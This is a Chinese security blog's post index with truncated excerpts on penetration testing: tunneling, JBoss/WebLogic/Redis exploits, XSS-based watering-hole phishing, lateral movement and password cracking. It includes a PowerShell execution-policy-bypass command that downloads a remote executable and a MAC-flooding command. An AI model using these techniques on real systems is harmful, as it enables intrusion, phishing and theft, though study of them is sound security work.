自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(215)
  • 资源 (1)
  • 收藏
  • 关注

原创 windows远程下载

文章目录windows远程下载windows远程下载powershell -exec bypass -c (new-object System.Net.WebClient).downloadfile(' 下载文件路径 ','C:\本地生成文件的名字.exe')

2021-03-07 15:39:58 805

原创 ssh隧道

文章目录ssh隧道原理ssh本地端口转发原理ssh远程端口转发原理ssh动态端口转发原理ssh隧道原理ssh本地端口转发原理本地ssh端口转发通常是边界服务器有外网网卡和内网网卡,则数据就是像图中顺时针走,这就叫本地ssh端口转发。使用场景:我们想从vps访问图中数据库服务器,但无法直接访问,所以需要使用web做为跳板,搭建ssh隧道ssh远程端口转发原理ssh远程端口转发:通常边界服务器没有外网网卡,所以,我们(vps)找不到它,让它来找我们,这也就是远程端口转发使用场景:我们

2021-03-06 20:48:24 760

原创 隧道技术的选择

2021-03-06 19:48:44 585

转载 DNS隧道-iodine使用

iodine可以通过一台dns服务器制造一个IPv4数据通道,特别适合在目标主机只能发送dns请求的网络中环境中使用。iodine是基于C语言开发的,分为服务端程序iodined和客户端程序iodine。iodine支持EDNS、base32,base64,base128等多种编码规范。    GitHub:https://github.com/boazsegev/iodine    iodine支持直接转发和中继两种模式,其原理是通过TAP虚拟网卡,在服务端建立一个局域网;在客户端,通过TAP建立

2021-03-06 19:38:42 789 1

转载 dnscat2搭建dns隧道

域名购买网站:https://dcc.godaddy.com/ 购买域名,并且注册网站,应用该模块安装服务端:apt-get install gemapt-get install ruby-devapt-get install libpq-devcd dnscat2/servergit clone https://github.com/iagox86/dnscat2.git编译bundle install中继模式启动服务端sudo ruby ./dnscat2.rb vpn.xxx -e

2021-03-06 13:40:20 1539 2

原创 MAC地址泛洪攻击

MAC地址泛洪原理攻击工具:macof使用方法:macof -i eth0(端口) -n 10(发送次数)配置路由ip DHCP pool XXXnetwork 默认网关 子网掩码(例如:192.168.1.0 255.255.255.0)default-router 192.168.1.254int e0/0ip address 192.168.1.254 255.255.255.0no shut在pc查看是否配好:ip dhcp攻击工具:yersinia -G 直接在里面选择网卡

2021-01-08 15:34:13 981

原创 日志分析-ip溯源

文章目录通过询问被攻击的时间通过攻击语句通过常用工具的指纹通过寻找频繁的访问通过询问被攻击的时间问管理员何时发生的异常,通过时间去寻找日志,快速发现当天访问情况通过攻击语句攻击者通常会使用攻击语句,可以直接搜索攻击语句即可如:select scirpt …/…/…/ 等通过常用工具的指纹攻击者可能会使用工具但是很多都有指纹,可以直接搜索指纹如:nmapsqlmapnessus通过寻找频繁的访问通过寻找平凡访问的连接,如:直接查看连接:post后台名字:xxxx/

2021-01-06 10:18:23 4143 1

转载 JBoss 4.x 5.x 6.xJBossMQ JMS 反序列化漏洞

文章目录 Jboss反序列化漏洞利用CVE-2017-12149/CVE-2017-7504 基础知识漏洞原理影响版本复现思路复现—CVE-2017-121491、特征检测2、反弹shell 复现—CVE-2017-75041、特征检测2、反弹shell 基础知识   序列化就是把对象转换成字节流,便于

2021-01-03 20:37:09 277

转载 weblogic常见漏洞

文章目录CVE-2017-10271CVE-2018-2628CVE-2018-2894CVE-2020-14882SSRF漏洞配合RedisWeblogic文件读取CVE-2017-10271Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。参考链接:https://www.exploit-db.com/exploits/43458/https://pape

2021-01-02 17:08:34 2700

转载 DnsLog盲注

1.基础知识1.DNSDNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。在RFC文档中RFC 2181对DNS有规范说明,RFC 2136对DNS的动态更新进行说明,RFC 2308对DNS查询的反向缓存进行说明。2.DnslogDn...

2021-01-02 15:34:03 380

转载 rsync未授权访问漏洞

文章目录 一、漏洞介绍二、漏洞环境三、漏洞利用3.1 漏洞探测3.2 漏洞利用(下载任意文件)3.3 漏洞利用(提权、反弹shell)3.3.1 方法一3.3.2 方法二 四、修复建议 一、漏洞介绍   rsync是Linux下一个远程同步工具,可快速同步多台主机中的文件和目录,如果配置不当,导致任何...

2020-11-07 11:57:58 3323 1

转载 weblogic ssrf漏洞复现

采用的虚拟机环境为ubuntu16.04,在虚拟机上搭建好docker环境。采用的vulhub来进行复现。 使用git来下载,命令为git clone https://github.com/vulhub/vulhub.git 进入ssrf漏洞中, cd /vulh...

2020-11-06 22:13:20 396

转载 weblogic(CVE-2018-2628漏洞复现)

0.先提几个概念JRMP:java remote method protocol,Java远程方法协议JRMP是的Java技术协议的具体对象为希望和远程引用。JRMP只能是一个Java特有的,基于流的协议。相对于的RMI - IIOP的 ,该协议JRMP只能是一个对象的Java到Java的远程调用,这使得它依赖语言,意思是客户端和服务器必须使用Java。JRMP:Java远程消息交换协议JRMP(Java Remote Messaging Protocol)该协议基于TCP/IP,既然是作为信息交换

2020-11-06 21:19:53 358

转载 Scapy模块下载

        Scapy(不是Scrapy)是Python中一个强大的数据包处理程序,它能够伪造或者解码大量的网络协议数据包,能够发送、捕捉、匹配请求和回复包等等。它可以很容易地处理一些典型操作,比如端口扫描,tracerouting,探测,单元 测试,攻击或网络发现(可替代hping,NMAP,arpspoof,ARP-SK,arping,tcpdump,tethereal,P0F等)。 最重要的他还有很多更优秀的特性——发送无效..

2020-11-06 16:55:09 834

原创 解决pip升级问题

pip show pip 出现以下问题WARNING: pip is being invoked by an old script wrapper. This will fail in a future version of pip. Please seehttps://github.com/pypa/pip/issues/5599 for advice on fixing theunderlying issue. To avoid this problem you can invoke Pytho

2020-11-06 16:06:55 4490 3

转载 JBoss5.x6.x 反序列化漏洞

JBOSS 下载地址:http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zipEXP 下载地址:https://github.com/yunxu1/jboss-_CVE-2017-121492). 环境搭建wget http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip第二步:修改配置文件,使网络中的主机都

2020-11-05 22:12:09 262 2

转载 Json注入

一、Json简介 JSON 是存储和交换文本信息的语法,是轻量级的文本数据交换格式。类似xml,但JSON 比 XML 更小、更快,更易解析。所以现在接口数据传输都采用json方式进行。JSON 文本的 MIME 类型是 "application/json"。 json语法 数据在名称/值对中数据由逗号分隔大括号保存对象中括号保存数组JSON 值 JSON 值可以是: 数字(整数或浮点数)  {"age":30 }字符串(在双引号中)...

2020-11-05 15:31:51 1392

转载 Redis 4.x/5.x未授权访问漏洞

Redis是什么? Redis是数据库,一个高性能的key-value存储系统,是使用ANSI C语言编写的。 Redis未授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有...

2020-11-04 12:24:41 758

转载 NTP放大攻击

前言 本节学习NTP放大攻击 1、简介 Network Time Protocol 保证网络设备时间同步电子设备互相干扰导致时钟差异越来越大,影响应用正常运行、日志审计不可信服务端口UDP 123 攻击原理 NTP 服务提monlist (MON_GETLIST) 查询功能,监控NTP 服务器的状况客户端查询时,NTP服务...

2020-11-03 14:15:56 1211

转载 python3.7 ‘utf-8‘ codec can‘t decode byte 0xbe in position 0: invalid start byte

报错代码: import syspath = r"..." #数据来源f = open(path)line = f.readline() while line:#提取数据 a = line.split( ) b = a[:] print(b) data.append(b) line = f.readline()f.close 报错信息:'utf-8' codec can't decode byte 0xbe in positio...

2020-10-31 10:55:15 1931

原创 逻辑漏洞-找回密码修改返回包

有时候在密码找回的时候,我们修改返回包为正确的返回包即可成功修改别人的密码将原本错误的返回包改为正确的返回包在点击foword看是不是修改返回包也可以修改密码

2020-10-29 21:25:11 788

原创 逻辑漏洞-token绕过

文章目录前端无回显前端有回显前端无回显看看是否有规律,是否可以爆破,一般都不行前端有回显以皮卡丘为例查看前端源码发现token存在前端抓包添加爆破的位置必须设置线程为1,因为如果多线程就是多个包token就不准了点击该位置的alwaysoptions中 在grep 位置添加找到token并添加token1位置随便搞几个token位置选这个开始爆破,可以看见每次爆破token都不一样了...

2020-10-29 20:51:49 1317

转载 网络安全-配置dns服务器

一、什么是DNS服务    DNS(Domain Name Server,域名服务器)是进行域名(domainname)和与之相对应的IP地址 (IP address)转换的服务器。DNS中保存了一张域名(domain name)和与之相对应的IP地址 (IP address)的表,以解析消息的域名。 域名是Internet上某一台计算机或计算机组的名称,用于在数据传输时标识计算机的电子方位(有时也指地理位置)。域名是由一串用点分隔的名字组成...

2020-10-23 15:17:02 933

转载 网络安全-windowserver搭建DHCP服务器

如何在windows server2016搭建DHCP服务器DHCP(Dynamic Host Configuration Protocol,动态主机配置协议)是一个局域网的网络协议。指的是由服务器控制一段IP地址范围,客户机登录服务器时就可以自动获得服务器分配的IP地址和子网掩码。DHCP服务器的搭建减少了管理员的工作量,避免了IP地址输入错误的可能,可以避免IP地址冲突,提供了IP地址的利用率,同时也方便了客户端的配置,下面我们就来在Windows server2016上面搭建DHCP服务器。一、首

2020-10-22 17:45:06 1479

原创 网络安全-NTFS权限和445文件共享

文章目录NTFS权限NTFS权限概念NTFS用户权限实验NTFS组权限实验445文件共享445文件共享概念445文件共享实验NTFS权限NTFS权限概念NTFS用户权限实验NTFS组权限实验445文件共享445文件共享概念445文件共享实验...

2020-10-22 08:14:54 591

转载 网络安全-破解win10开机密码

此处为了方便给大家录屏,我用的是虚拟机,当然真机我也是自己测试过了,放心使用 正文开始:   一.由上图看出,我们完全忘记了该用户的密码,此时,重启电脑,在windows徽标出现的时候 , 强制关机,再开机,再次强制关机,再次开机,简单来说就是: 忘记密码-》重启-》看见windows徽标 -》强制关机-》开机-》看见windows徽标-》强制关机-》开机(此时会有windows自动修复的提示,表示我们第一阶段成功) tips:首先大家不要害...

2020-10-20 21:01:47 3440 3

原创 网络安全-用户管理

文章目录一.windows内置账户二.windows内置组内置组的权限默认被系统赋予组管理命令用户管理命令普通用户提权到administrator命令图形化用户组操作演示命令行操作演示一.windows内置账户给人使用的账户administrator # 管理员账号guest #来宾账户计算机服务组件相关的系统账号system #系统账户 ==权限至高无上local services #本地服务账户 ==权限等于普通用户network services #网络服务账户 ==权限等于普

2020-10-20 18:12:10 839

原创 网络安全-windows批处理

文章目录基础简单命令批处理批处理基础批处理语法总结批处理练习基础简单命令1.重定向>>为追加>为覆盖echo ddd > zft.txt2.type查看文件type zft.txttype zft.txt | more 分页显示3.rd . /s/qcd ..\4.写入多行copy con zft.txt 复制zft.txt到屏幕copy con 文件名.扩展名开始编辑内容ctrl+z结束编写5.移动move hah.txt

2020-10-20 10:34:35 690

原创 水坑钓鱼

文章目录前言实现流程将js插入XXS平台中附上大佬们的flash和自己修改的钓鱼页面前言水坑钓鱼顾名思义就是给别人埋伏一个坑,让别人去跳,而水坑钓鱼常用的手段则是寻找一个储存型XSS,我们在插入的xss中,使用js实现一个弹窗功能,当用户点击该弹窗就跳转到我们的钓鱼页面,从而欺骗用户下载远程木马实现流程将js插入XXS平台中1.在下源码中找到该位置,将该url改为你钓鱼页面,该js只是实现弹窗和css等效果2.并将该js写入自己xss平台var s1 = document.createE

2020-10-19 17:06:46 41326 2

原创 内网渗透简单思路

内网渗透简单思路无域环境1.nessus或goby扫描2.尝试ms17010(win7),ms0708(win server),ms0796(win10)等3.并可以内网嗅探,dns欺骗,内网钓鱼等有域环境1.寻找域内管理员,拿到域管理员权限并提权2.内网渗透,爆hash批处理尝试登陆3.有时候目标在内网或有防火墙,想实现3389或ssh连接这时候就要尝试搞个端口转发4.如果内网有防火墙,尝试添加隧道代理或者从网络层应用层面搭建隧道...

2020-10-19 15:46:37 997

原创 内网渗透-路由添加

文章目录前言msf实现路由添加msf查看网卡情况,并且添加路由利用proxychain配合socks4代理渗透前言在内网渗透的时候,有时候我们想继续探测内网的资源,但是由于防火墙的原因导致我们无法继续访问内部资源,此时我们就可以考虑添加路由或者端口转发等技术。msf实现路由添加msf查看网卡情况,并且添加路由#获取当前主机下的网络架构分布run get_local_subnets添加路由访问run autoroute -s 192.168.22.0/24查看当前路由列表ru

2020-10-19 15:22:24 1096

转载 内网渗透-端口转发

目录 内网转发 reGeorg结合proxychains代理链(HTTP隧道)  EW(EarthWorm)结合proxychains代理链 EW正向代理 EW反向代理 Ssocks正向代理(Linux)​ Netsh实现端口转发 Netsh实现SSH到内网主机(远程端口转发) Netsh实现3389到内网主机(远程端口转发) Netsh实现本地端口转发 LCX实现端口转发 LCX实现本地端口转发(Windows的场景) LCX实...

2020-10-18 21:15:10 1175

原创 内网渗透-域内有网和无网

文章目录前言域内主机有网攻击流程域内主机无网操作流程前言在渗透测试的过程中,拿下域内一台主机以后,有时候内网的其他主机有网,有时候没网,此时,如果有网我们就按常规的渗透测试即可,如果没网我们就应该以该主机作为跳板,使用socks协议或其他办法,从而实现与无网的主机进行通信域内主机有网攻击流程通过域环境webserver主机的外网WEB服务开启到域控权限的获取假如已经获取webserver权限:0x01:通过phpmyadmin弱口令getshell0x02:msf生成 msf监听

2020-10-18 21:11:10 758

转载 红队测试之邮箱打点

文章目录(1)通过扫描c段找到入口(2)通过扫描子域名的的方式找到邮件入口(3)通过搜索引擎爬取钓鱼文件制作1)传统宏文件2)CHM钓鱼3)CVE-2018-21744)Windows 快捷键5)构造DDE钓鱼文档6) word 中插入外部对象(OLE)方式欺骗7) IQY特性钓鱼8)PPT 动作按钮特性构造 PPSX钓鱼9)RAR解压钓鱼#该文章转载于酒仙六号部队,如有不便,请练习本人立即删除随着互联网信息快速发展,办公已经离不开网络的支持。邮箱成为了人们常用的办公方式之一。本文主要从信息收集为第一

2020-10-17 16:13:46 1964

原创 内网渗透-域渗透简单思路

文章目录1.权限提升2.渗透姿势爆hash,爆aes key爆hash爆aes key3.远程登录注册表修改连接命令4.连接操作PTH攻击(利用明文或hash连接)IPC(明文连接主机)WMI(利用明文连接)SMB(利用明文或hash连接)RDP(利用明文或hash连接)WMI工具(利用明文或hash连接)PTK攻击(aes key 进行连接)PTT攻击(权限维持)Golden ticket(黄金票据)silver ticket(白银票据)5.bat批量连接测试1.权限提升一开始一定要提到admini

2020-10-16 18:04:55 4273 1

转载 msfvenom生成木马和内网穿透

msfvenom命令行选项如下:英文原版中文版:Options:-p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, --nopsled <lengt

2020-10-16 11:12:10 2205

原创 内网渗透-域内信息收集

文章目录域内基础信息收集查询域查询域内所有计算机查询所有域成员计算机列表获取域信任查询域控器查域控器的主机名查询域控组获取域内用户和管理员信息查询所有域用户列表向控制器进行查询获取域内用户的详细信息查看存中的用户查看本地管理员用户查询域管理员用户查询域管理员用户查询管理员用户组定位域管理员查找域管理员获取域管理员列表查询域控列表列出本机所有进程及用户域内基础信息收集查询域net view /domain查询域内所有计算机net view /domain:GOD##查询域内所有用户列表

2020-10-14 22:28:45 536

原创 内网渗透-工作组信息收集

文章目录查询网络配置查询用户列表查询进程列表查询操作系统及安装软件的版本查询端口列表查询补丁列表查询本机共享查询防火墙配置和关闭防护墙查询并开启远程连接服务查询当前权限获取域的sid查询指定用户详细信息查询网络配置ipconfig /all看是否有域,是内网还是外网,或者有两个网卡,有内网又有外网查询用户列表net user 用户列表net localgroup administrator 查询本地管理员和组query user || qwinsta 查看当前在线用户----->&

2020-10-14 21:04:29 535

转载 Aircrack-ng破解无线WIFI密码

首先,如果kali是装在虚拟机里面的话,是不能用物理机的无线网卡的。所以,如果我们要想进行无线破解,需要外接一个无线网卡设备,并且该设备要支持 monitor 监听模式 iwconfig :系统配置无线网络设备或显示无线网络设备信息的命令。iwconfig命令类似于ifconfig命令,但是他配置对象是无线网卡,它对网络设备进行无线操作,如设置无线通信频段 auto: 自动模式essid:设置ESSIDnwid:设置网络IDfreq...

2020-10-10 22:08:29 1018

转载 无线网络的加密方式:WEP、WPA和WPA2

目录 有线等效加密( WEP ) Wi-Fi 访问保护( WPA ) Wi-Fi 访问保护 II( WPA2 ) WPA-PSK/WPA2-PSK 无线网标准 有线等效加密( WEP )   有线等效保密( WEP )是世界上使用最广泛的 Wi-Fi 安全算法。因为历史的缘故,以及向后兼容的原因,很多路由器的控制面板中,用户会发现该算法位于加密类型选择菜单的首位。   WEP 于199年9月被批准作为 Wi-Fi 安全标准。即使在当时那个年代,第一...

2020-10-10 22:06:22 2499

js练习.html

php_xss_代码审计

2020-02-29

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除